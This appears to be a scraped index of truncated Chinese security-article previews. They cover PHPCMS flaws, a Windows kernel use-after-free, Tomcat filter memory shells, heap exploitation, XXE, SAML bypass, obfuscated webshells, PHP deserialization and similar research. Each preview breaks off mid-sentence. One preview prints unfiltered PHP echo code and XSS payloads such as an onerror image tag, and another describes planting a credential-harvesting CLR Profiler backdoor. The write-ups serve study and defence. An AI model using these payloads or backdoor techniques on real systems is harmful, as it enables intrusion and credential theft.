Server纷纷躺枪,这个漏洞横扫WebLogic、WebSphere、JBoss、Jenkins、OpenNMS的最新版。而在将近10个月前,
Gabriel Lawrenc... | 社区文章 |
> 本篇详细分析了 **PHPCMS**
> 的部分历史漏洞。其中多是以获取到漏洞点为场景,反向挖掘至漏洞触发入口(假设自己发现了漏洞点,模拟如何找寻整个攻击链及其入口点),旨在提高自身代码审计能力。当中包含一些网络上未公开的触发点,以及补丁对比分析与绕过。
## v9.6.1任意文件读取
这个版本的 **任意文件读取** 漏洞和上个版本的 **SQL注入** 漏洞原理是类似的,且出问题的文件均在
**phpcms/modules/content/down.php** 中。在该文件的 **download** 方法中最后一行调用了
**file_down** 文件下载函数,我们可以看到其第一个参数是要读取的文件路径。
我们再来看看 ... | 社区文章 |
# Windows内核漏洞分析:CVE-2018-0744
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
在今年年初谷歌的安全人员公布了一个由于DCE属性导致的uaf,其公布的poc如下:
从谷歌安全研究员给出调试信息我们可以了解到这是一个tagwnd对象导致的uaf。
在分析漏洞之前我们先了解一下本次漏洞相关的两个属性:CS_CLASSDC和CS_OWNDC,当windows对象被设置了CS_CLASSDC属性并且所属窗口类没有被设置dce对象时,在调用CreateWindow创建窗口的过程中,内核会调用CreateCacheDc,创建DCE对象(下图节选自wrk):
同样通过上图可以看出... | 社区文章 |
**0x01、什么是XHR**
XHR,也就是XMLHttpRequest,是现代浏览器都有的一个内置对象,使用
XMLHttpRequest对象可以与服务器交互。无需刷新整个页面即可从URL获取数据,允许网页在不影响用户的操作的情况下更新页面的局部内容,多应用于
AJAX 编程中。
特别注意的是XMLHttpRequest 可以用于获取任何类型的数据,而不仅仅是XML,它甚至 **支持 HTTP 以外的协议(包括 file:// 和
FTP)**
**0x02、利用一:读取本地文件**
适用于XSS打到后台管理员,以普通用户身份构造payload发送给管理员,登录后台触发payload并查看回显(也就是拿到cookie能够... | 社区文章 |
# 以初学者角度调试filter内存马
[TOC]
这片主要是以初学者角度,通过跟踪filter注解的初始化流程、以及运行时调试的方式了解filter的动态注册过程。
提前说一下注册大致流程,通过request对象获取StandardContext对象,然后设置以下三个变量:
存放每个filter的类的位置:org.apache.catalina.core.StandardContext#filterDefs
存放每个filter的url映射:org.apache.catalina.core.StandardContext#filterMaps
存放每个filter的配置,构建filterChain用到的变量:org.a... | 社区文章 |
### house of orang 基本原理:
覆盖unsorted bin空闲块,修改其大小为0x61(small bin [4]),修改bk指向
`_IO_list_all`-0x10,同时布置fake file struct,然后分配堆块,触发unsorted bin attack 修改
`_IO_list_all`,将修改过的unsorted bin 放入 small bin 4中,继续遍历unsorted bin会触发异常,调用
`malloc_printerr`,该函数调用栈如下:
malloc_printerr
_libc_message(error msg)
abort
... | 社区文章 |
# 编写插桩ASP.NET MVC程序的CLR Profiler后门
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
在之前某次渗透测试中,发现一个ASP.NET的站点,通过数据库权限提权拿下系统之后发现站点的密码是经过几次编码和不可逆加密算法存储的。导致无法通过管理员的账号密码登录系统(因为当时是个比较重要的系统,因此需要账号密码来登录后台),因此最后的解决办法就是通过加密算法生成一个新的密码,再写入数据库中来登录。但之后接触到了CLR
Profiler,于是想起用这种方式来获取管理员的账号密码,本次文章仅介绍思路以供研究学习,切勿用于非法用途。
## CLR Profiler探... | 社区文章 |
**作者:yudan@慢雾安全团队 & Jerry@EOS Live 钱包
公众号:[慢雾科技](https://mp.weixin.qq.com/s/6qb6nYLIUeUJViaFgHVX_A "慢雾科技")**
本篇攻击手法技术分析基于 EOS 1.8 以前版本,在新版本中未做测试。
## 0x01 事件回顾
根据慢雾区情报,EOS DApp EOSPlay 中的 DICE 游戏于9月14日晚遭受新型随机数攻击,损失金额高达数万
EOS。经过慢雾安全团队的分析,发现攻击者(账号:muma ***** *mm)在此次攻击过程中利用 EOS
中的经济模型的缺陷,使用了一种新型的随机数攻击手法对项目方进行攻击。
在开始详细的细节... | 社区文章 |
# 一类混淆变形的Webshell分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
> 本篇原创文章参加双倍稿费活动,预估稿费为800元,活动链接请点[此处](https://www.anquanke.com/post/id/98410)
## Webshell简介
Webshell起初是作为管理员进行服务器远程管理的一类脚本的简称。现在Webshell更多的指Web入侵的工具脚本。Webshell不同于漏洞,而是利用应用漏洞或者服务器漏洞后上传到服务器进行后续利用,属于渗透测试的post-exploitation(后续利用阶段)。Webshell文件大小与功能千差万别,从最简单的一句话类命... | 社区文章 |
# 漏洞概述
研究人员在最常见的Learning Management
Systems(LMS)插件LearnPress、LearnDash和LifterLMS中发现了多个安全漏洞,包括权限提升漏洞、SQL注入、远程代码执行漏洞。
研究人员共发现了4个漏洞,分别是CVE-2020-6008、CVE-2020-6009、CVE-2020-6010和CVE-2020-11511。攻击者利用这些漏洞可以让学生甚至非认证的用户获取敏感细腻些、编辑个人记录,甚至控制LMS平台。
# 漏洞分析
## LearnPress漏洞
是WordPress最主流的LMS插件,可以让网站管理员很容易地创建和销售在线课程。据BuiltWith消息,Learn... | 社区文章 |
# 【知识】9月16日 - 每日安全知识热点
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
**热点概要:音乐视频服务网站Vevo遭OurMine入侵,3.12TB数据被公布、ExpensiveWall:又一个影响420多万Google Play
Store用户的Android恶意软件(含分析报告)、逆向英雄联盟客户端、BlueBorne安全威胁浅析、[exploit-db]D-Link DIR8xx
Routers多个漏洞、RDP Pivoting with Metasploit**
**
**
**资讯类:**
****
音乐视频服务网站Vevo遭OurMine入侵... | 社区文章 |
# Attack Spring Boot Actuator via jolokia Part 1
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
前段时间看到twitter上有国外的研究人员[Exploiting Spring Boot
Actuators](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)这篇文章,打算跟着这篇文章学习一下。作者已经提供了一个[简单的demo](https://github.com/artsploit/actuator-testbed)用于大家调试。这篇是对ch.qos... | 社区文章 |
# 6月5日安全热点 - 微软宣布75亿美元微软股票收购 Github
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
##
## 漏洞 Vulnerability
多个 Jenkins 插件漏洞
<http://t.cn/R1naKcu>
横河电机 STARDOM 控制器高危漏洞预警
<http://t.cn/R1m4tbF>
## 安全工具 Security Tools
Backdoorme:强大的自动后门程序
<http://t.cn/Rb892JC>
PowerShell Empire Web:使用 Web 界面操作的PowerShell Empire
<http://t.cn/RftT0... | 社区文章 |
# BEGO Token 攻击事件分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 事件背景
零时科技区块链安全情报平台监控到消息,北京时间2022年10月20日,BSC链上EGO 合约受到黑客攻击,攻击者一次性mint
10,000,000,000,000,000 BEGO
代币,攻击者地址为0xde01f6Ce91E4F4bdB94BB934d30647d72182320F,零时科技安全团队及时对此安全事件进行分析。
## 漏洞核心
BgeoToken.mint函数调用时,会对函数签名进行判断。但函数签名十五r,s,v的值由用户自行传入,并且对于传入需要mint的数量没有限制。
在判... | 社区文章 |
# 【漏洞分析】CVE-2017-0038:GDI32越界读漏洞从分析到Exploit
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
****
****
作者:[k0shl](http://bobao.360.cn/member/contribute?uid=1353169030)
稿费:600RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**前言**
前段时间我在博客发了一篇关于CVE-2017-0037 Type
Confusion的文章,其中完成了在关闭DEP情况下的Exploit,当时提到做这个漏洞的时候,感觉由于利用面的限制,导致似... | 社区文章 |
# 【技术分享】利用FRIDA攻击Android应用程序(四)
|
##### 译文声明
本文是翻译文章,文章来源:enovella.github.io
原文地址:<https://enovella.github.io/android/reverse/2017/05/20/android-owasp-crackmes-level-3.html>
译文仅供参考,具体内容表达以及含义原文为准。
翻译:[ **houjingyi233**](http://bobao.360.cn/member/contribute?uid=2802394681)
预估稿费:200RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿... | 社区文章 |
**译者:知道创宇404实验室翻译组
原文链接:<https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/>**
黑客总是在寻找热门诱饵,以诱骗受害者进入感染系统。我们最近分析了一个这样的诱饵,即一个伪造的 Windows 11安装程序。2022年1月27日,也就是
[Windows 11升级最后阶段](https://docs.microsoft.com/en-us/windows/release-health/status-windows-11-21h2)宣布的第二天,我们注意到一个恶意的黑客注册了域名 _wind... | 社区文章 |
## 作者:magic-zero
作为一个学习web安全的菜鸟,前段时间被人问到PHP反序列化相关的问题,以前的博客中是有这样一篇反序列化漏洞的利用文章的。但是好久过去了,好多的东西已经记得不是很清楚。所以这里尽可能写一篇详细点的文章来做一下记录。
我们来参考这里:
https://secure.php.net/manual/zh/language.oop5.magic.php
我们根据官方文档中的解释,一个一个来进行测试。
`__construct()` 和 `__destruct()`
`__construct()`被称为构造方法,也就是在创造一个对象时候,首先会去执行的一个方法。
我写了这样的一个demo来做测试:
... | 社区文章 |
p4举办的一场比赛
主要分析一下其中的一道Kernel PWN
题目不算难,但很适合内核入门
## p4fmt
### Analyze
拿到题目,解压后一共三个文件:
bzImage#内核映像
initramfs.cpio.gz#文件系统
run.sh#qemu启动脚本
qemu启动脚本启动后看到:
====================
p4fmt
====================
Kernel challs are always a bit painful.
No internet access, no SSH, no file copying.
... | 社区文章 |
# 越权漏洞自动化治理实践
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 背景
在现代微服务服务架构转型和企业安全水准越来越高的情况下,传统的安全漏洞越来越少,更多的漏洞集中于越权( **IDOR** )、并发条件竞争( **race
condition** )这类逻辑漏洞。在 **2021** 年发布的 **OWASP Top 10** 里,权限类漏洞风险 **(Broken
Access Control-** 控制权限失效 **)** 也被列在首位。相比较传统安全漏洞,越权漏洞可能产生的危害更大,影响面更广,例如某个
**API** 接口可以越权访问其他用户敏感信息,通过遍历就能窃取全... | 社区文章 |
文/ **SuperHei(知道创宇404安全实验室)** 2016.4.11
注:文章里“0day”在报告给官方后分配漏洞编号:CVE-2016-1843
### 一、背景
在前几天老外发布了一个在3月更新里修复的iMessage xss漏洞(CVE-2016-1764)细节 :
https://www.bishopfox.com/blog/2016/04/if-you-cant-break-crypto-break-the-client-recovery-of-plaintext-imessage-data/
https://github.com/BishopFox/cve-2016-1764
他们公布这些细节里其实没有给出详细... | 社区文章 |
## 基础知识
Java Classloader是JRE的一部分,动态加载来自系统、网络或其他各种来源Java类到Java虚拟机的内存中。
Java源代码通过Javac编译器编译成类文件,然后JVM来执行类文件中的字节码来执行程序。
> 这样理解,Classloader就是通过一系列操作,把各种来源的各种格式的数据,以一个正确合适的类解析方式解析,读入内存,让JVM能理解执行
>
> 拿XML举例来理解,一个xml可以是系统里的xml、可以是我们自己写的xml文件、可以是HTTP传输的XML数据,只要格式规范,就能被读取
## JAVA常见的ClassLoader
### BootstrapClassLoader
`Bootstra... | 社区文章 |
# Windows内网协议学习LDAP篇之域权限下
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
作者:daiker@360RedTeam
## 0x00 前言
这两篇文章主要是讲windows
域内的权限访问控制,这是下篇,主要有SeEnableDelegationPrivilege特权,一些高危ACL以及AdminSDHolder的介绍,可用于域内的ACL路径攻击以及留作后门。
## 0x01 特权
在上一篇windows 访问控制模型的时候,有讲到过,A访问B,首先判断安全对象B是不是需要特权才能访问,如果需要特权,则查看A的Access
Token看有没有那个特权。。
如果我们需要赋予域... | 社区文章 |
# Linux Kernel KPTI保护绕过
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
> 最近做题遇到一种错误,当执行ROP返回用户态时会报一个段错误。后面了解到是因为内核开启了KPTI保护。于是本篇文章主要讲述针对这种保护的绕过方法。
## KPTI简介
在没有开启
`KPTI`保护的内核中,每当执行用户空间代码时,`Linux`会在其分页表中保留整个内核内存的映射,即用户地址空间和内核地址空间将使用同一个页全局目录表,并保护其访问。
`KPTI(Kernel page-table
isolation)`,即内核页表隔离。通过把进程页表按照用户空间和内核空间隔离成两块来防止内核页表泄... | 社区文章 |
# shellcode分析技巧总结
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 1.摘要
很多恶意代码会使用在内存中解密shellcode来执行其主要的恶意行为,使用这种技术不会在磁盘留下任何痕迹,从而来躲避杀软的检测,还有的恶意代码使用多层嵌套的shellcode来增加分析的难度,下面我总结了恶意代码经常使用shellcode的方式,和分析shellcode的一些技巧
## 2.恶意代码执行shellcode的方法
### 2.1 从资源或数据段中获取
这是最常见的一种加载shellcode的方法,大多数样本都使用这种方法来把shllcode加载到内存中执行,通常都是先申请内存(一... | 社区文章 |
**作者:Joey@天玄安全实验室**
**原文链接:<https://mp.weixin.qq.com/s/8EosEscGJmLt00z02uCQuA>**
## 前言
本文在FireEye的研究[Hunting COM Objects[1]](https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html)的基础上,讲述COM对象在IE漏洞、shellcode和Office宏中的利用方式以及如何挖掘可利用的COM对象,获取新的漏洞利用方式。
## COM对象简述
(微软组件对象模型),是一种独立于平台的分布式系统,用于创建可交互的二... | 社区文章 |
**作者:天宸@蚂蚁安全实验室
原文链接:<https://mp.weixin.qq.com/s/QAvFyfAetlwF3Vow-liEew>**
### 引言
EOS
在诞生之初的新闻报道里,被视为区块链3.0的代表。EOS的交易处理速度据称能够达到每秒百万量级,与其相比,以太坊每秒20多笔,比特币每秒7笔的处理速度实在是捉襟见肘。
据 2018 年10月 DappRadar 数据显示,排名前10的 EOS DAPP 中有6个属于博彩游戏,在所有的 EOS Dapp
中,博彩类游戏24小时交易量占比达到 84% 以上。EOS 玩家戏称博彩应用为菠菜应用。
2021 年 4 月,我们又统计了 Dappradar 列出的前 57... | 社区文章 |
### 作者:LoRexxar'@知道创宇404实验室
# 前端防御的开始
对于一个基本的XSS漏洞页面,它发生的原因往往是从用户输入的数据到输出没有有效的过滤,就比如下面的这个范例代码。
<?php
$a = $_GET['a'];
echo $a;
对于这样毫无过滤的页面,我们可以使用各种方式来构造一个xss漏洞利用。
a=<script>alert(1)</script>
a=<img/src=1/onerror=alert(1)>
a=<svg/onload=alert(1)>
对于这样的漏洞点来说,我们通常会使用htmlspecialchars函数来过滤输入,这个函数会处理5... | 社区文章 |
# CVE-2020-1947:Apache ShardingSphere远程代码执行漏洞
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
近日监测到友商关于CVE-2020-1947的漏洞公告,360灵腾安全实验室判断漏洞等级为高,利用难度低,威胁程度高,影响面中。建议使用用户及时安装最新补丁,以免遭受黑客攻击。
## 0x00 漏洞概述
ShardingSphere是一套开源的分布式数据库中间件解决方案组成的生态圈,它由Sharding-JDBC、Sharding-Proxy和Sharding-Sidecar(计划中)这3款相互独立的产品组成。
他们均提供标准化的数据分片、分布式事务和数据库治... | 社区文章 |
# 【漏洞分析】Joomla!3.7.0 Core com_fields组件SQL注入漏洞
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
****
**
**
**传送门**
* * *
**[【漏洞预警】Joomla!3.7.0 Core
SQL注入漏洞(更新漏洞环境)](http://bobao.360.cn/learning/detail/3868.html)**
[**【漏洞分析】Joomla!3.7.0 Core SQL注入漏洞详细分析(含PoC、漏洞环境)**
****](http://bobao.360.cn/learning/detail/3870.ht... | 社区文章 |
# 如何绕过AMSI执行任意恶意PowerShell代码
##### 译文声明
本文是翻译文章,文章来源:github.io
原文地址:<https://0x00-0x00.github.io/research/2018/10/28/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html>
译文仅供参考,具体内容表达以及含义原文为准。
## 概述
在此前,我曾经介绍过如何从本地管理员用户手动获取SYSTEM
Shell。在渗透测试期间,这是一个非常有价值的步骤,但往往会在最后面进行,因为这一步的前提是已经获得了目标主机的访问权限。
而我们本文介绍的方法... | 社区文章 |
# Flare-On 2018 writeup(下)
##### 译文声明
本文是翻译文章
原文地址:<https://mp.weixin.qq.com/s/ATfGsx04Knc4QRByvXaxlA>
译文仅供参考,具体内容表达以及含义原文为准。
程序先修改注册表,复制自身自运行
然后释放下载后门的代码,载入内存运行
后门下载器加载库函数从ldr链表中遍历模块和模块函数,使用Hash来获取API定位,此后的API都用这种方法遍历,由于是病毒经典使用方法,可以搜到hash表,没有搜索到的可以动态修改hash参数来取结果
<https://www.scriptjunkie.us/files/kernel32.dll.txt>
后门下... | 社区文章 |
此文章描述了一个影响使用SAML的单点登录(SSO)系统的新型漏洞。
此漏洞可允许那些经过身份验证的攻击者对SAML系统进行欺骗,以便在不知道受害者用户密码的情况伪造该用户进行登录。
`Duo Security`的高级研究团队Duo Labs发现了多个受此漏洞影响的产品:
* OneLogin - python-saml - CVE-2017-11427
* OneLogin - ruby-saml - CVE-2017-11428
* Clever - saml2-js - CVE-2017-11429
* OmniAuth-SAML - CVE-2017-11430
* Shibboleth - CVE-20... | 社区文章 |
# 浅谈 Syscall
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0x00 syscall 基础概念
Windows下有两种处理器访问模式:用户模式(user mode)和内核模式(kernel mode)。用户模式下运行应用程序时,Windows
会为该程序创建一个新进程,提供一个私有虚拟地址空间和一个私有句柄表,因为私有,一个应用程序无法修改另一个应用程序的私有虚拟地址空间的数据;内核模式下,所有运行的代码都共享一个虚拟地址空间,
因此内核中驱动程序可能还会因为写入错误的地址空间导致其他驱动程序甚至系统出现错误。
内核中包含了大部分操作系统的内部数据结构,所以用户模式下的应用... | 社区文章 |
**作者:且听安全
原文链接:<https://mp.weixin.qq.com/s/F2jFMkmN3K9yn_uuICStuA>**
### 概述
很多 .NET 应用程序在修复 `BinaryFormatter` 、 `SoapFormatter` 、`LosFormatter` 、
`NetDataContractSerializer` 、`ObjectStateFormatter` 等反序列化漏洞时,喜欢通过自定义
`SerializationBinder` 来限定类型,从而达到缓解反序列化攻击的目的。历史上很多 .NET
反序列化漏洞都采用了这种方法,但是我们查看微软官方的警告说明:
使用 `Serializatio... | 社区文章 |
### 关于星链计划
「404星链计划」是知道创宇404实验室于2020年8月提出的开源项目收集计划,这个计划的初衷是将404实验室内部一些工具通过开源的方式发挥其更大的价值,也就是“404星链计划1.0”,这里面有为大家熟知的Pocsuite3、ksubdomain等等,很快我们就收到了许多不错的反馈。2020年11月,我们将目光投向了整个安全圈,以星链计划成员为核心,筛选优质、有意义、有趣、坚持维护的开源安全项目,为立足于不同安全领域的安全研究人员指明方向,也就是“404星链计划2.0”。为了更清晰地展示和管理星链计划的开源项目,2022年11月22日我们将1.0和2.0整合,推出改版后的「404星链计划」。
**Github地... | 社区文章 |
原文:<https://blog.ret2.io/2018/08/28/pwn2own-2018-sandbox-escape/>
作为Pwn2Own 2018系列文章的第六篇,同时也是最后一篇,本文将详实记录为了利用macOS
WindowServer漏洞,我们为武器化CVE-2018-4193漏洞所历经的漫长而曲折的道路。作为一种基于内存破坏技术的提权方法(获取root权限),它将以零日漏洞攻击的形式来实现macOS
10.13.3平台的Safari沙箱逃逸。
首先,我们将描述现有漏洞的限制。接着,介绍用于发现与我们的漏洞兼容的破坏目标的工具和技术,然后,详细介绍为Pwn2Own
2018开发的漏洞利用程序。最后,为了回馈安全社... | 社区文章 |
# Linux PWN从入门到熟练
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
最近在复习pwn的一些知识。主要涉及到当堆栈开启了保护的时候,我们不能够直接将shellcode覆盖到堆栈中执行,而需要利用程序其他部分的可执行的小片段来连接成最终的shellcode。此小片段就是gadgets。本文主要通过练习题的方式讲述如何寻找gadgets,如何利用现有的工具来加速自己的pwn的效率。Gadgets的类型和难度也逐步变化。下面带来手把手教你linux
pwn。让你的pwn技术从入门到熟练。练习题的难度逐步加大。
## 第一关
第一关的gadgets较为简单,包含了一个直接可以利用的,可返回... | 社区文章 |
# GIF/Javascript Polyglots :滥用GIF、tag和MIME类型成灾
* * *
本文为《[GIF/Javascript Polyglots: Abusing GIFs, tags and MIME types for
evil](https://0x00sec.org/t/gif-javascript-polyglots-abusing-gifs-tags-and-mime-types-for-evil/5088)》的翻译文章。
## 前言
最近,我注意到个正在接管的项目的一个功能,这个功能就是它允许热连接到任意gif图片上并且不用通过把gif导入、修改、保存下来就可以实现为我们所用的目的。既然这个功能如此... | 社区文章 |
### 0x00 前言
某日,某位小伙伴在微信上发我一个问题,如何利用已知的存储型XSS漏洞在后渗透测试中扩大战果,如RCE?想来这是个很值得思考的一个问题,故有此文。
### 0x01 分析
首先分析一下问题的题干:
* 存储型XSS
* 后渗透利用
首先整理一下可能的思路:
* 思路一:利用浏览器的漏洞来达到代码执行的效果
* 思路二:利用浏览器的内置功能直接执行系统命令,如:IE的ActiveX
* 思路三:利用XSS获取NTLMhash再结合SMB Relay攻击来渗透内网
思路一的利用成本较高尤其是当下的浏览器想找到一个好用的RCE漏洞不是难么容易,放弃!
思路二的利用局限性很大,尤其是IE的Activ... | 社区文章 |
# 《Chrome V8源码》29.CallBuiltin()调用过程详解
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 1 摘要
本篇文章是Builtin专题的第五篇,详细分析Builtin的调用过程。在Bytecode
handler中使用`CallBuiltin()`调用Builtin是最常见的情况,本文将详解`CallBuiltin()`源码和相关的数据结构。本文内容组织方式:重要数据结构(章节2);`CallBuiltin()`源码(章节3)。
## 2 数据结构
**提示:** Just-In-Time Compiler是本文的前导知识,请读者自行查阅。
Builtin的调... | 社区文章 |
## **前言:**
**最近做了一道WEB题,涉及到XML外部实体注入(即XXE漏洞),恰好也没有系统的学习过,这次就了解一下XXE漏洞。**
## **0x01:简单了解XML**
XML 指可扩展标记语言(EXtensible Markup Language)
XML 是一种标记语言,很类似 HTML
XML 被设计为传输和存储数据,其焦点是数据的内容
XML 被设计用来结构化、存储以及传输信息
XML 允许创作者定义自己的标签和自己的文档结构
### **XML的优点:**
`xml`是互联网数据传输的重要工具,它可以跨越互联网任何的平台,不受编程语言和操作系统的限制,非常适合Web传... | 社区文章 |
# 序列化与反序列化
## 序列化
定义:利用`serialize()`函数将一个对象转换为字符串形式
我们先看一下直接输出对象是什么效果,代码如下
<?php
class test{
public $name="ghtwf01";
public $age="18";
}
$a=new test();
print_r($a);
?>
效果如下
这个时候我们利用`serialize()`函数将这个对象进行序列化成字符串然后输出,代码如下
<?php
class test{
... | 社区文章 |
# CVE-2020-1317:Windows组策略中的漏洞
|
##### 译文声明
本文是翻译文章,文章原作者 Eran Shimony,文章来源:cyberark.com
原文地址:<https://www.cyberark.com/resources/threat-research-blog/group-policies-going-rogue>
译文仅供参考,具体内容表达以及含义原文为准。
## 0x00 绪论
本文是一个为期一年的研究项目的一部分,该项目发现了各大供应商的60个不同漏洞。本文讨论Windows组策略对象(GPO)机制中的一个漏洞。此漏洞专门针对策略更新步骤,允许域环境中的标准用户执行文件系统攻击,进而允许... | 社区文章 |
## 概述
Rhino 是完全使用 Java 编写的 JavaScript 的开源实现,使 Java 可以调用 js 脚本,实现脚本语言与 Java 语言的数据交换
> 如果使用了与 Ubuntu 或 Debian 捆绑在一起的 OpenJdk,则可能依然存在此条利用链
这里使用的依赖版本为`rhino-javascript-1.7R2`
## MozillaRhino1
### ScriptableObject
首先看看官方的解释
这是`Scriptable`接口的一个默认实现,这个类提供了很多方法,能够通过这些方法定义`JavaScript`对象的多种属性和方法
我们看看`Scriptable`接口的解释
这个接口是所有java... | 社区文章 |
# 【知识】11月17日 - 每日安全知识热点
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
**热点概要:美国政府发现 朝鲜政府指使的恶意网络活动HIDDEN COBRA中的远控工具:
FALLCHILL、卡巴斯基对美国2014年9月“方程式”恶意软件检测事件调查报告、AngelaRoot:一加手机刷入SuperSU的app、Cisco
IOS的shellcode生成工具、WMI
repositories取证脚本、对ShadownBrokers放出的exploit——epichero的分析**
资讯类:
卡巴斯基对2014年9月"方程式"恶意软件检测事件调查报告
<htt... | 社区文章 |
# 家用ISP网关MCU的缓冲区溢出漏洞利用
##### 译文声明
本文是翻译文章,文章来源:https://courk.cc/
原文地址:<https://courk.cc/index.php/2018/06/01/a-remote-vulnerability/>
译文仅供参考,具体内容表达以及含义原文为准。
由于原文冗长,本文是我在阅读文章思考后选取的一部分重点内容摘要。
[TOC]
## 硬件综述
### 功能简介
从用户的角度来看,我的STB/网关具有以下常用功能:
* 电视和宽带互联网可通过Cable获得。
* 它作为家用的网关,可以连接到以太网和WiFi, WPA2是默认启用的。
* 它也可以作为机顶盒使... | 社区文章 |
Subsets and Splits
Top 100 EPUB Books
This query retrieves a limited set of raw data entries that belong to the 'epub_books' category, offering only basic filtering without deeper insights.